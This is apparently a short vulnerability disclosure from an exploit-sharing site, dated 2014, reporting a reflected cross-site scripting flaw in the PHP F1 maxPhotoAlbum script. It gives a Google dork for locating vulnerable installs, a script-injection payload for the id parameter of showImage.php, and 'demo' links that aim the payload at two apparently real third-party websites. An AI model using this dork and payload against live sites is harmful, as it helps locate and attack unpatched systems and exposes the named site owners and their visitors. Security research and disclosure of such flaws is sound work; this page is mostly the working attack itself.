facebook facebook twitter rss

PHP F1 XSS Vulnerability

Author: wlhaan hacker , Published: 05-10-2014
PHP F1 XSS Vulnerability

name scripts:PHP F1

webscripts:http://www.phpf1.com

download:
http://www.phpf1.com/downloads/scripts/maxPhotoAlbum.zip

Created By :wlhaan Hacker:





google dork:

"Photo Album" "Powered by PHP F1"

____________________________________

poc

showImage.php?id="><script>alert('XSS')</script


http://server/path/showImage.php?id="><script>alert('XSS')</script>

demo:

http://adpolzek.com/maxpa/showImage.php?id="><script>alert('XSS')</script>

http://theblues.theliquidloungerocks.com/BluesPhotoAlbum/showImage.php?id="><script>alert('XSS')</script



Discovered By : wlhaan hacker


https://twitter.com/waleedal3ybani

https://www.facebook.com/waleed.alaibani

Like us on Facebook :